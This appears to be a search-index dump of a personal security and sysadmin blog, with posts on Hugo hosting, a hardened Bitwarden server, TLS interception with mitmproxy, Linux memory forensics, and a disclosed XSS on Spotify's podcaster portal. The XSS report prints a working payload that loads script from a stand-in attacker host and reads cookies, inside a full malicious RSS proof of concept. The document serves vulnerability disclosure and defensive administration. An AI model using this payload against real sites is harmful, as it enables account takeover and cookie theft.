A CNAME will be set for www.example.com and CNAME flattening applied to example.com, because CNAME records are not allowed on root/apex domains.\nPage Rules To get to the Page Rules menu, head over to your main home and select your domain name. Next, go to Rules and select Create page rule.\nI personally only use two rules that are applied on the markuta.com domain. The first rule redirects all requests from www.markuta.com to markuta.com. The second rule redirects any HTTP request to HTTPS.\nRule 1) Redirect www to non-www\nURL to match https://www.markuta.com/* Settings are: Forwarding URL with 301 - Permanent Redirect https://markuta.com/$ Rule 2) Redirect all HTTP to HTTPS\nURL to match: http://*markuta.com/* Settings are: Always Use HTTPS Issues and Solutions There were some issues along the way but they have now been solved.\nCloudflare Pages builds For some reason Cloudflare Pages kept failing to build the Hugo website. After hours of researching and rebuilding I found the culprit.\nExample of Cloudflare logs below:\n... 17:51:34.982	Installing missing commands 17:51:34.982	Verify run directory 17:51:34.982	Executing user command: hugo 17:51:35.019	Start building sites … 17:51:35.019	hugo v0.87.0-B0C541E4+extended linux/amd64 BuildDate=2021-08-03T10:57:28Z VendorInfo=gohugoio 17:51:35.226	ERROR 2021/08/28 16:51:35 JSON parse error: expected comma character or an array or object ending on line 61 and column 40 17:51:35.226	12: { 17:51:35.226	^ ... The issue was down to an option in the config.toml file. The theme I chose had a line minifyOutput = true which is to do with minifying HTML/CSS elements. I just wish Cloudflare would\u0026rsquo;ve been a little more helpful with their error messages. After changing the option to false, the website built successfully.\nRunning Hugo locally I tend to run a Hugo site locally before pushing to Github. 
After doing a git clone of the remote repo on a new device and running hugo server -D the local site failed to load properly.\nExample of Hugo logs below:\n... WARN 2021/08/29 02:10:21 found no layout file for \u0026#34;HTML\u0026#34; for kind \u0026#34;term\u0026#34;: You should create a template file which matches Hugo Layouts Lookup Rules for this combination. WARN 2021/08/29 02:10:21 found no layout file for \u0026#34;HTML\u0026#34; for kind \u0026#34;term\u0026#34;: You should create a template file which matches Hugo Layouts Lookup Rules for this combination. WARN 2021/08/29 02:10:21 found no layout file for \u0026#34;HTML\u0026#34; for kind \u0026#34;term\u0026#34;: You should create a template file which matches Hugo Layouts Lookup Rules for this combination. WARN 2021/08/29 02:10:21 found no layout file for \u0026#34;HTML\u0026#34; for kind \u0026#34;term\u0026#34;: You should create a template file which matches Hugo Layouts Lookup Rules for this combination. WARN 2021/08/29 02:10:21 found no layout file for \u0026#34;HTML\u0026#34; for kind \u0026#34;term\u0026#34;: You should create a template file which matches Hugo Layouts Lookup Rules for this combination. | EN -------------------+----- Pages | 53 Paginator pages | 0 Non-page files | 43 Static files | 11 Processed images | 0 Aliases | 0 Sitemaps | 1 Cleaned | 0 Built in 67 ms ... This one was my fault. I had forgotten that the PaperMod theme is a git submodule and I didn\u0026rsquo;t give the --recurse-submodules flag when cloning the repo. 
If you\u0026rsquo;ve already cloned the repo you can still run it manually:\ngit submodule init git submodule update Useful Links Cloudflare\u0026rsquo;s guide on how to deploy a Hugo site ","permalink":"https://markuta.com/hugo-site-on-cloudflare-pages/","title":"Hugo Site on Cloudflare Pages"},{"categories":null,"contents":"In this blog post I\u0026rsquo;ll be covering how to install a self-hosted Bitwarden server as a password management solution using Docker on a Raspberry Pi. We will get two containers running: a Bitwarden server and an Nginx reverse proxy. I\u0026rsquo;ll also go into hardening the Bitwarden configuration and applying 2FA for log-ins.\nWhat is Bitwarden? Bitwarden is an open-source password management solution. It supports almost all major systems. The version we\u0026rsquo;re going to be using is the unofficial one created by Daniel Garcia, Github page: https://github.com/dani-garcia/bitwarden_rs. This version of Bitwarden is unofficial but it\u0026rsquo;s really well made, and just works.\nRequirements Raspberry Pi (I\u0026rsquo;m using a model 3 B+) Docker software Bitwarden_rs (unofficial version) Domain name for TLS certificate Optional Zymkey 4i is a Hardware Security Module for RPi. Installation To start off with you\u0026rsquo;ll want to download and install the latest version of Raspbian on your Pi. I personally recommend Raspbian Buster Lite (now called Raspberry Pi OS Lite). Since it will be running 24/7 as a server, you don\u0026rsquo;t really need a desktop environment nor the default office suite packages that are included. Make sure that the device is connected to the internet and contains the latest packages. I also like to enable SSH during the initial installation process and harden the sshd_config configuration file.\nI will cover how to install the Zymbit Zymkey 4i IoT security module in a future post.\nDocker We are going to be running Bitwarden as a Docker container.
Docker makes it simple to manage containers, which we can easily upgrade in the future. The image we are going to use is available on https://hub.docker.com/r/bitwardenrs/server.\nDownload and install Docker with the following on the Pi:\nsudo curl -fsSL get.docker.com -o get-docker.sh \u0026amp;\u0026amp; sudo sh get-docker.sh Give the user permission to run Docker (pi is the default user):\nsudo usermod -aG docker pi Make sure Docker starts on every system boot:\nsudo systemctl enable docker Restart your Raspberry Pi:\nsudo reboot Once restarted, your Raspberry Pi should be ready to move on to the configuration.\nConfiguration Now that we have all the necessary applications installed we can continue with the configuration. We will first set up a Bitwarden container, as well as the Nginx reverse proxy container. Later on we\u0026rsquo;ll configure a docker-compose file to start all containers at once; I will be using a custom docker-compose file, found here.\nA quick overview of what we\u0026rsquo;re going to do:\nPull the latest bitwarden_rs image from Docker hub First Start-up create a new account enable two-factor authentication Stop the container disable new registrations disable admin panel enable HTTPS support Start the container with the new options + nginx Pulling image from Docker Hub The Docker image we\u0026rsquo;re going to use is by https://hub.docker.com/r/bitwardenrs/server. You can find the source code on https://github.com/dani-garcia/bitwarden_rs. You also no longer need to use the tag bitwardenrs/server:raspberry for Raspberry Pi systems.\nTo pull the image with Docker:\ndocker pull bitwardenrs/server:latest First Time Start-up After downloading the Docker image you will want to choose a folder to mount as a volume on the host system for persistent storage. The directory that I have chosen is located at /bw-data.
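As a small sketch (assuming the same /bw-data path; adjust it to your own setup), the mount point can be created ahead of time so the container has somewhere to write:

```shell
# Create the host directory that will back the container's /data volume
sudo mkdir -p /bw-data

# The container process runs as root by default, so root ownership is fine
sudo chown root:root /bw-data
ls -ld /bw-data
```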
This is where all of our encrypted passwords will be stored, along with other web files.\nTo run the container for the first time:\ndocker run -d --restart always \\ --name bitwarden \\ -e SIGNUPS_ALLOWED=true \\ -v /bw-data/:/data/ \\ -p 60888:80 \\ bitwardenrs/server:latest Your Bitwarden web server will be accessible at: http://\u0026lt;IP-ADDRESS\u0026gt;:60888. You can change the external port number by modifying the previous command (-p). Go ahead and register an account and log in. To enable 2FA follow the steps below.\nGo to Settings: Select Two-step login and the type of 2FA you want to use. For example Authenticator app: Then enter your code. You can now stop the container and move on to the next stage: locking down your Bitwarden server and adding an Nginx reverse proxy.\ndocker stop bitwarden Hardening Process In the next step we\u0026rsquo;ll be going through the process of hardening our server for actual use. We\u0026rsquo;ll be covering how to set up an Nginx reverse proxy and also install a certificate.\nTo keep things organised I\u0026rsquo;ve created a folder called bitwarden which stores all configuration files and folders; the structure looks like this:\n- bw-data/ - nginx/ - nginx.conf - ssl.conf - dhparams.pem - docker-compose.yml Docker Compose This docker-compose.yml file was created to ease the installation process. It defines two containers with some configuration options. You will have to change these to suit your own environment.
The environment variables for the Bitwarden container are for my own personal preference.\nversion: \u0026#34;3.5\u0026#34; services: nginx: restart: always image: nginx:stable-alpine container_name: nginx volumes: - ./nginx/dhparams.pem:/etc/ssl/dhparams.pem - ./nginx/ssl.conf:/etc/nginx/ssl.conf - ./nginx/nginx.conf:/etc/nginx/nginx.conf - ./nginx/cache/:/etc/nginx/cache - ./nginx/error.log:/etc/nginx/error.log - /etc/letsencrypt:/etc/letsencrypt - /etc/ssl/certs/self-signed.crt:/etc/ssl/certs/self-signed.crt - /etc/ssl/private/self-signed.key:/etc/ssl/private/self-signed.key ports: - \u0026#34;60888:60888\u0026#34; networks: - bit_net bitwarden: restart: always image: bitwardenrs/server:latest container_name: bitwarden volumes: - ./bw-data:/data environment: - TZ=Europe/London - LOG_FILE=/data/bitwarden.log - EXTENDED_LOGGING=true - LOG_LEVEL=warn - ROCKET_WORKERS=20 - WEBSOCKET_ENABLED=true - SIGNUPS_ALLOWED=false - DISABLE_ADMIN_TOKEN=true - INVITATIONS_ALLOWED=false - SHOW_PASSWORD_HINT=false - DISABLE_ICON_DOWNLOAD=false ports: - \u0026#34;80\u0026#34; - \u0026#34;3012\u0026#34; networks: - bit_net networks: bit_net: name: bit_net nginx.conf The nginx.conf file I use for the reverse proxy for Bitwarden. Within each server configuration update listen 60888 and server_name bitwarden.example.com; to suit your own preference. 
You can leave the rest as it is.\nhttp { error_log /etc/nginx/error.log warn; client_max_body_size 20m; server_tokens off; # Use self-signed certificate for IP addresses server { listen 60888 default_server ssl http2; server_name _; server_name_in_redirect off; return 404; # deny all requests ssl_certificate /etc/ssl/certs/self-signed.crt; ssl_certificate_key /etc/ssl/private/self-signed.key; } # The main Bitwarden web config server { listen 60888 ssl http2; server_name bitwarden.example.com; include /etc/nginx/ssl.conf; # valid certificate client_max_body_size 128M; location / { proxy_pass http://bitwarden:80; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; } location /notifications/hub { proxy_pass http://bitwarden:3012; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection \u0026#34;upgrade\u0026#34;; } location /notifications/hub/negotiate { proxy_pass http://bitwarden:80; } } } ssl.conf This file will be included by the previous nginx.conf. 
You need to replace the options ssl_certificate, ssl_certificate_key, and ssl_trusted_certificate to suit your own domain name.\nssl_certificate /etc/letsencrypt/live/example.com/fullchain.pem; ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem; # Improve HTTPS performance with session resumption ssl_session_cache shared:SSL:10m; ssl_session_timeout 10m; # Enable server-side protection against BEAST attacks ssl_protocols TLSv1.2; ssl_prefer_server_ciphers on; ssl_ciphers \u0026#34;ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA384\u0026#34;; # RFC-7919 recommended: https://wiki.mozilla.org/Security/Server_Side_TLS#ffdhe4096 ssl_dhparam /etc/ssl/dhparams.pem; ssl_ecdh_curve secp521r1:secp384r1; # Additional Security Headers # ref: https://developer.mozilla.org/en-US/docs/Security/HTTP_Strict_Transport_Security add_header Strict-Transport-Security \u0026#34;max-age=31536000; includeSubDomains\u0026#34;; # ref: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options add_header X-Frame-Options DENY always; # ref: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content-Type-Options add_header X-Content-Type-Options nosniff always; # ref: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-XSS-Protection add_header X-XSS-Protection \u0026#34;1; mode=block\u0026#34; always; # Enable OCSP stapling # ref. 
http://blog.mozilla.org/security/2013/07/29/ocsp-stapling-in-firefox ssl_stapling on; ssl_stapling_verify on; ssl_trusted_certificate /etc/letsencrypt/live/example.com/fullchain.pem; resolver 1.1.1.1 1.0.0.1 [2606:4700:4700::1111] [2606:4700:4700::1001] valid=300s; # Cloudflare resolver_timeout 5s; dhparams.pem To generate a 4096-bit Diffie-Hellman parameter with openssl, type:\nopenssl dhparam -out dhparams.pem 4096 Certificates DO NOT USE THE DEFAULT HTTP PORT FOR YOUR PASSWORD MANAGEMENT!\nTo use the official Bitwarden app on say an iPhone with your self-hosted environment you need to use a valid TLS certificate. If you don\u0026rsquo;t the OS will throw an error and refuse the connection since the certificate isn\u0026rsquo;t valid. A workaround may be to add your self-signed certificate (not tested) to the trusted list on each device. A better approach would be to generate a valid TLS certificate.\nFor Let\u0026rsquo;s Encrypt there are two main methods of verification (excluding TLS-ALPN-01): HTTP-01 and DNS-01. If you\u0026rsquo;re like me with an ISP that uses a heavily NATed network then you can\u0026rsquo;t really use the first option. So I\u0026rsquo;ll be using second option which requires a domain name.\nDownload and install certbot with:\nsudo apt-get install certbot Run certbot with DNS as the preferred challenge:\ncertbot --manual --preferred-challenges dns certonly -d \u0026#39;*.example.com\u0026#39; I\u0026rsquo;d recommend you to obtain a wildcard certificate instead of a single subdomain certificate. 
This way you don\u0026rsquo;t need to reveal your Bitwarden server to the world, since there\u0026rsquo;s a public record of every Let\u0026rsquo;s Encrypt registered certificate.\nStarting and Stopping We will be using docker-compose along with the docker-compose.yml file to start and stop containers.\nTo start your set-up, type (-d makes it run in the background):\ndocker-compose up -d To stop the containers, type:\ndocker-compose down Thanks Bitwarden for creating an awesome password management solution.\nDani Garcia for creating a port of Bitwarden.\nLet\u0026rsquo;s Encrypt for free certificates for everyone.\n","permalink":"https://markuta.com/bitwarden-and-nginx-server-on-raspberry-pi/","title":"Bitwarden and Nginx Server on Raspberry Pi"},{"categories":null,"contents":"It\u0026rsquo;s been a while since I posted. This is a quick update on the new changes. I\u0026rsquo;m now using a new Jekyll theme called klisé by Mahendrata Harpi. With this change, I\u0026rsquo;ll also try to post more regularly since my last post was back in 2019.\nI have also added my public key which is available here.\n","permalink":"https://markuta.com/changed-jekyll-theme/","title":"Changed Jekyll Theme"},{"categories":null,"contents":"In this blog post I\u0026rsquo;ll share a report I wrote a few months ago for an XSS bug found on podcasters.spotify.com. This was submitted on HackerOne but unfortunately it had already been reported and mine was considered a duplicate. Oh well, better luck next time.\nSummary When a user submits a new podcast RSS feed for verification, the description tag inside it is not properly escaped.
This results in JavaScript being executed on the page which could allow attackers to hijack users\u0026rsquo; session cookies and/or take over accounts.\nImpact When a user submits a malicious or compromised podcast RSS feed, attackers would be able to hijack the user\u0026rsquo;s account.\nSteps To Reproduce Start by navigating to: https://podcasters.spotify.com/submit Click on \u0026ldquo;Get Started\u0026rdquo; button Submit a malicious RSS feed link (proof of concept provided) The page renders whatever is in \u0026lt;description\u0026gt;\u0026lt;/description\u0026gt; The proof of concept simply shows the logged-in user\u0026rsquo;s cookie in the web browser. I\u0026rsquo;ve provided a link to my custom podcast RSS feed: https://attacker.com/feed.xml. The feed.xml attachment contains HTML which includes a x.js Javascript which alerts the user\u0026rsquo;s cookie. This was tested to check whether it was possible to get around Content-Security-Policy, and it is.\nSample of feed.xml (view attachment):\n----[CUT]---- \u0026lt;description\u0026gt; \u0026lt;![CDATA[\u0026lt;svg/onload=body.appendChild(document.createElement`script`).src=\u0026#39;https://attacker.com/x.js\u0026#39; hidden/\u0026gt;]]\u0026gt; \u0026lt;/description\u0026gt; ----[CUT]---- And x.js simply contains:\nalert(document.cookie) Proof of Concept feed.xml\n\u0026lt;rss version=\u0026#34;2.0\u0026#34; xmlns:itunes=\u0026#34;http://www.itunes.com/dtds/podcast-1.0.dtd\u0026#34; xmlns:googleplay=\u0026#34;http://www.google.com/schemas/play-podcasts/1.0\u0026#34; xmlns:atom=\u0026#34;http://www.w3.org/2005/Atom\u0026#34; xmlns:media=\u0026#34;http://search.yahoo.com/mrss/\u0026#34; xmlns:content=\u0026#34;http://purl.org/rss/1.0/modules/content/\u0026#34;\u0026gt; \u0026lt;channel\u0026gt; \u0026lt;atom:link href=\u0026#34;https://attacker.com/feed.xml\u0026#34; rel=\u0026#34;self\u0026#34; type=\u0026#34;application/rss+xml\u0026#34;/\u0026gt; \u0026lt;title\u0026gt;REKITTO\u0026lt;/title\u0026gt; 
\u0026lt;link\u0026gt;https://attacker.com/feed.xml\u0026lt;/link\u0026gt; \u0026lt;language\u0026gt;en-gb\u0026lt;/language\u0026gt; \u0026lt;description\u0026gt;\u0026lt;![CDATA[\u0026lt;svg/onload=body.appendChild(document.createElement`script`).src=\u0026#39;https://attacker.com/x.js\u0026#39; hidden/\u0026gt;]]\u0026gt;\u0026lt;/description\u0026gt; \u0026lt;image\u0026gt; \u0026lt;url\u0026gt;https://attacker.com/serial-itunes-logo.png\u0026lt;/url\u0026gt; \u0026lt;title\u0026gt;XYZ\u0026lt;/title\u0026gt; \u0026lt;link\u0026gt;https://attacker.com/\u0026lt;/link\u0026gt; \u0026lt;/image\u0026gt; \u0026lt;itunes:explicit\u0026gt;no\u0026lt;/itunes:explicit\u0026gt; \u0026lt;itunes:type\u0026gt;episodic\u0026lt;/itunes:type\u0026gt; \u0026lt;itunes:subtitle\u0026gt;True stories from the dark side of the Internet\u0026lt;/itunes:subtitle\u0026gt; \u0026lt;itunes:author\u0026gt;Tester\u0026lt;/itunes:author\u0026gt; \u0026lt;itunes:summary\u0026gt;Summary text here.\u0026lt;/itunes:summary\u0026gt; \u0026lt;itunes:owner\u0026gt; \u0026lt;itunes:name\u0026gt;Tester\u0026lt;/itunes:name\u0026gt; \u0026lt;itunes:email\u0026gt;user@example.com\u0026lt;/itunes:email\u0026gt; \u0026lt;/itunes:owner\u0026gt; \u0026lt;itunes:image href=\u0026#34;https://attacker.com/serial-itunes-logo.png\u0026#34;/\u0026gt; \u0026lt;itunes:category text=\u0026#34;Technology\u0026#34;\u0026gt; \u0026lt;/itunes:category\u0026gt; \u0026lt;item\u0026gt; \u0026lt;title\u0026gt;Streaming: The Example Show\u0026lt;/title\u0026gt; \u0026lt;description\u0026gt;Some text here.\u0026lt;/description\u0026gt; \u0026lt;pubDate\u0026gt;Sat, 23 May 2020 03:29:15 -0000\u0026lt;/pubDate\u0026gt; \u0026lt;itunes:title\u0026gt;Testing\u0026lt;/itunes:title\u0026gt; \u0026lt;itunes:episodeType\u0026gt;trailer\u0026lt;/itunes:episodeType\u0026gt; \u0026lt;itunes:keywords\u0026gt;\u0026lt;![CDATA[\u0026lt;p\u0026gt;More Text\u0026lt;/p\u0026gt;]]\u0026gt;\u0026lt;/itunes:keywords\u0026gt; 
\u0026lt;itunes:author\u0026gt;Tester\u0026lt;/itunes:author\u0026gt; \u0026lt;itunes:image href=\u0026#34;https://attacker.com/serial-itunes-logo.png\u0026#34;/\u0026gt; \u0026lt;itunes:subtitle\u0026gt;Streaming: The Example Show\u0026lt;/itunes:subtitle\u0026gt; \u0026lt;itunes:summary\u0026gt;Another summary :)\u0026lt;/itunes:summary\u0026gt; \u0026lt;content:encoded\u0026gt; \u0026lt;![CDATA[\u0026lt;p\u0026gt;Even more encoded text\u0026lt;/p\u0026gt;]]\u0026gt; \u0026lt;/content:encoded\u0026gt; \u0026lt;itunes:duration\u0026gt;6\u0026lt;/itunes:duration\u0026gt; \u0026lt;itunes:explicit\u0026gt;no\u0026lt;/itunes:explicit\u0026gt; \u0026lt;guid isPermaLink=\u0026#34;false\u0026#34;\u0026gt;\u0026lt;![CDATA[dd10738e-9efg-11ea-bb2d-cf99e05d892b]]\u0026gt;\u0026lt;/guid\u0026gt; \u0026lt;enclosure url=\u0026#34;https://attacker.com/sample.mp3\u0026#34; length=\u0026#34;6\u0026#34; type=\u0026#34;audio/mpeg\u0026#34;/\u0026gt; \u0026lt;/item\u0026gt; \u0026lt;/channel\u0026gt; \u0026lt;/rss\u0026gt; ","permalink":"https://markuta.com/xss-on-spotify-podcasters/","title":"A XSS bug on Spotify's Podcasters"},{"categories":null,"contents":"Overview In this guide we\u0026rsquo;ll be going through the process of configuring an intercepting set-up using mitmproxy and a wireless network, to inspect, modify and monitor encrypted HTTPS traffic. This will allow for a simple way to analyse traffic on mobile handsets and IoT devices, with the only requirements is Wi-Fi support and the ability to install custom certificates.\nmitmproxy is your swiss-army knife for debugging, testing, privacy measurements, and penetration testing. It can be used to intercept, inspect, modify and replay web traffic such as HTTP/1, HTTP/2, WebSockets, or any other SSL/TLS-protected protocols. 
read more\nA simple illustration of mitmproxy running in transparent mode under Debian Buster:\nThe communication process:\niPhone \u0026lt;==\u0026gt; Wi-Fi TAP \u0026lt;==\u0026gt; mitmproxy \u0026lt;== (IP Forwarding) \u0026lt;==\u0026gt; Internet Requirements Software There are several software packages required for this set-up, all of which can be downloaded through apt-get on most Linux based systems. As mentioned previously I\u0026rsquo;ll be using Debian Stretch, but the guide can be applied to other systems.\nList of required packages:\nmitmproxy – an HTTP traffic interception tool. dnsmasq - a lightweight DNS forwarder and DHCP service. hostapd – a utility used for creating the wireless access point. tcpdump – an all-round great packet capture utility. To install all of the above:\nsudo apt update sudo apt install mitmproxy hostapd dnsmasq tcpdump Hardware As for hardware, the only requirement is having two network interface cards, one for providing Internet connectivity and the other for broadcasting the wireless access point. I\u0026rsquo;ll be using one I bought from Amazon (a TP-Link Archer T2U Nano AC600), which is cheap and supports 2.4GHz and 5GHz natively on Linux systems, and my MacBook Pro\u0026rsquo;s built-in wireless card.\nDrivers The TP-Link Archer T2U Nano AC600 WiFi adapter requires additional effort when installing on Linux. The only driver that worked was realtek-rtl88xxau-dkms version 5.2.20.2~20190617, available here.\ngit clone https://gitlab.com/kalilinux/packages/realtek-rtl88xxau-dkms cd realtek-rtl88xxau-dkms sudo ./dkms-install.sh To check if the driver installed properly, plug in your USB adapter and ensure pass-through is enabled within the virtualization software.
In my case, VMware Fusion (Menu \u0026gt; Virtual Machine \u0026gt; USB \u0026amp; Bluetooth).\nRun the following inside the virtual machine: ip a\nThere should be two network interface cards, one called ens33 which will provide access to the Internet, and the other interface we just created called wlxd037XXXXXXXX will be configured as our wireless access point to use with mitmproxy.\nConfigure Networking Ensure the newly created network interface has a static IP address and a gateway address. This will point to the Dnsmasq service in the next step. Use the following network configuration and replace the network interfaces to suit your own. A reboot may be required.\nNetwork configuration file: /etc/network/interfaces\n# This file describes the network interfaces available on your system # and how to activate them. For more information, see interfaces(5). source /etc/network/interfaces.d/* # The loopback network interface auto lo iface lo inet loopback # The primary network interface allow-hotplug ens33 iface ens33 inet dhcp # The secondary network interface allow-hotplug wlxd037XXXXXXXX iface wlxd037XXXXXXXX inet static address 10.0.0.254 netmask 255.255.255.0 gateway 10.0.0.254 IP Forwarding and iptables Start by enabling IP forwarding and add masquerade rules with iptables to route and redirect specific network traffic to mitmproxy. This will be persistent.\nEdit the main system config: /etc/sysctl.conf and uncomment this line:\nnet.ipv4.ip_forward=1 Apply the following rules to iptables (replace to suit your wireless interface):\nsudo iptables -t nat -A PREROUTING -i wlxd037XXXXXXXX -p tcp --dport 80 -j REDIRECT --to-port 8080 sudo iptables -t nat -A PREROUTING -i wlxd037XXXXXXXX -p tcp --dport 443 -j REDIRECT --to-port 8080 Dnsmasq To make devices have their own IP addresses assigned automatically, a DHCP server is required. Dnsmasq is a lightweight DNS forwarder and DHCP server suitable for small networks.
This makes sense otherwise we would need to manually assign addresses.\nCreate and modify the configuration file: /etc/dnsmasq.conf and replace it with:\n# Wireless Interception Interface interface=wlxd037XXXXXXXX # DHCP server and range for assigning IP addresses dhcp-range=10.0.0.1,10.0.0.100,96h # Broadcast gateway and DNS server information dhcp-option=option:router,10.0.0.254 dhcp-option=option:dns-server,10.0.0.254 Hostapd And finally, create the wireless network with Hostapd. This wireless network will operate under the 2.4GHz frequency (channel 7) and will be able to forward traffic onto the primary interface.\nCreate a new configuration file: /etc/hostapd/hostapd.conf\ninterface=wlxd037XXXXXXXX driver=nl80211 ssid=TAP hw_mode=g channel=7 ht_capab=[HT40][SHORT-GI-20] wmm_enabled=0 macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0 wpa=2 wpa_passphrase=gimme_the_loot wpa_key_mgmt=WPA-PSK wpa_pairwise=CCMP TKIP rsn_pairwise=CCMP To use the 5GHz band with TP-Link adapter the Hostapd configuration file needs to be changed and driver needs to be loaded with:\nmodprobe -r 88XXau \u0026amp;\u0026amp; modprobe 88XXau rtw_vht_enable=2 mitmproxy Saving TLS master keys to a file while running mitmproxy. With this file Wireshark is able to decrypt TLS traffic. See the Wireshark wiki for more information. Modify your .bashrc file and export the environment variable:\nexport SSLKEYLOGFILE=\u0026#34;$HOME/sslkeylogfile.txt\u0026#34; tcpdump When you want to capture all network traffic from an interface and you do not want to intercept or modify the flow. 
In that case, flush the previous iptables rules and apply a new one.\nTo flush all iptables rules within the nat table:\nsudo iptables -t nat -F And add a new rule to masquerade traffic to the Internet interface:\nsudo iptables -t nat -A POSTROUTING -o ens33 -j MASQUERADE After that you can run a tcpdump packet capture:\nsudo tcpdump -i \u0026lt;interface\u0026gt; -s 65535 -w \u0026lt;file\u0026gt; Launching First, start the Dnsmasq server:\nsudo systemctl start dnsmasq Next, start the Hostapd service:\nsudo systemctl start hostapd Finally, start mitmproxy, for example in transparent mode:\nmitmproxy --mode transparent --showhost iPhone Here is an example of monitoring traffic using an iPhone device. First, connect to the wireless network created by Hostapd as you would to a regular Wi-Fi network.\nThen, open a browser and navigate to http://mitm.it (make sure mitmproxy is running). Download the certificate for your device type and hit allow.\nNext, go to Settings \u0026gt; General \u0026gt; Profile \u0026gt; mitmproxy \u0026gt; Install Profile. When installed, go back to the main Settings, then General \u0026gt; About \u0026gt; Certificate Trust Settings, and enable full trust for the root certificate.\nFixes There appears to be an issue with mitmproxy packages on Debian (Stretch and Buster). When visiting http://mitm.it/ to download certificates, the page does not display the links properly.
This leaves the user to manually browse to the certificate URLs on each device.\nhttp://mitm.it/cert/pem – Android \u0026amp; iOS http://mitm.it/cert/p12 – Windows Or find and edit the file /usr/lib/python3/dist-packages/mitmproxy/addons/onboardingapp/templates/layouts.html and replace:\n\u0026lt;link href=\u0026#34;/static/bootstrap.min.css\u0026#34; rel=\u0026#34;stylesheet\u0026#34;\u0026gt; \u0026lt;link href=\u0026#34;/static/font-awesome.min.css\u0026#34; rel=\u0026#34;stylesheet\u0026#34;\u0026gt; With:\n\u0026lt;link href=\u0026#34;//stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css\u0026#34; rel=\u0026#34;stylesheet\u0026#34;\u0026gt; \u0026lt;link href=\u0026#34;//stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css\u0026#34; rel=\u0026#34;stylesheet\u0026#34;\u0026gt; Resources A list of useful resources:\nHow to use Transparent mode in VMs Running a Man-in-the-middle proxy on a Raspberry pi 3 Raspberry Pi as Wireless Access Point Four ways to Bypass Certificate Pinning on Android Bypass SSL Pinning Android ","permalink":"https://markuta.com/tp-link-archer-t2u-nano-for-tls-traffic-interception/","title":"TP-Link Archer T2U Nano for TLS Traffic Interception"},{"categories":null,"contents":"In this blog post I\u0026rsquo;ll be demonstrating the process of acquiring a memory image from a running Linux system. The tool of choice is LiME (Linux Memory Extractor), which is available on GitHub.\nAfter a forensic image has been acquired we will use Volatility with a custom Linux profile for the analysis. To keep things simple I\u0026rsquo;ve used the latest Debian Stretch kernel version 4.9.0-8-amd64 as the target system so it\u0026rsquo;s easily repeatable.\nBuilding LiME Kernel Module LiME (formerly DMD) is a Loadable Kernel Module (LKM), which allows the acquisition of volatile memory from Linux and Linux-based devices, such as those powered by Android.
read more\nTo use the Kernel module it must be built for that specific Kernel version, otherwise insmod will not be able to load it. There are also times when targets may use non-standard Kernels i.e. Grsecurity or completely custom ones.\nIdeally the following should be done on a forensics workstation. But there are times when it may be necessary to compile and load the module directly on a target system, an example would be when a custom Linux Kernel is present.\nPrerequisites sudo apt install linux-headers-4.9.0-8-amd64 sudo apt install build-essential Download LiME git clone https://github.com/504ensicsLabs/LiME Compile cd LiME/src/ make You\u0026rsquo;ll notice a file being created named lime-4.9.0-8-amd64.ko this is our LKM.\nMemory Acquisition With LiME you have the option to either write to disk or transfer over the network. The latter may pose issues with firewalls or high network usage environments. Nevertheless, the option is there, for our purposes we will be writing to a disk. In a real world scenario you\u0026rsquo;d be writing to some form of external media.\nWrite to disk The following uses insmod to load our compiled Loadable Kernel Module. The options format=lime and timeout=0 are important for Volatility. Testing revealed there are a few issues with type raw.\nsudo insmod lime-4.9.0-8-amd64.ko \u0026#34;path=/media/external/dump.mem format=lime timeout=0\u0026#34; Write over the network Similar to the above we start a listening session on a port 4444 using tcp:port:\nsudo insmod lime-4.9.0-8-amd64.ko \u0026#34;path=tcp:4444 format=lime timeout=0\u0026#34; On a remote host workstation we can use netcat to establish a connection and download the image:\nnc 10.10.1.10 4444 \u0026gt; dump.mem Cleaning up When complete to unload the Kernel Module simply type: sudo rmmod lime\nBuilding Linux Volatility Profile Building a Linux profile for Volatility requires a bit more effort. There are times when it may not work correctly. 
Many people have experienced issues with Linux Kernel versions 4.8+ due to the way Kernel address space layout randomization (KASLR) works.\nAs mentioned above in this blog post we\u0026rsquo;ll be building a Linux profile for Debian Stretch system with the Kernel Version: 4.9.0-8-amd64 (2018-08-21) which is confirmed working with Volatility.\nDownload Volatility git clone https://github.com/volatilityfoundation/volatility Install Dependencies sudo apt install dwarfdump pcregrep libpcre++-dev python-dev python-pip Install Python Modules pip install pycrypto Distorm3 OpenPyxl ujson Building a Profile Navigate to volatility/tools/linux and type the following:\nsudo make -C /lib/modules/$(uname -r)/build CONFIG_DEBUG_INFO=y M=$PWD modules dwarfdump -di ./module.o \u0026gt; module.dwarf sudo zip Debian4908.zip module.dwarf /boot/System.map-$(uname -r) Move or copy the created zip file to the following directory within Volatility:\ncp Debian4908.zip ../../plugins/overlays/linux/ Now when running --info we should see our newly created Linux Profile(s) LinuxDebian4908x64 as available. The archive we created will be prepended with Linux and appended with x64 dependent on the architecture type.\nMemory Analysis with Volatility Now comes the fun part. Once everything is set up correctly and we\u0026rsquo;ve acquired a forensic image using LiME. 
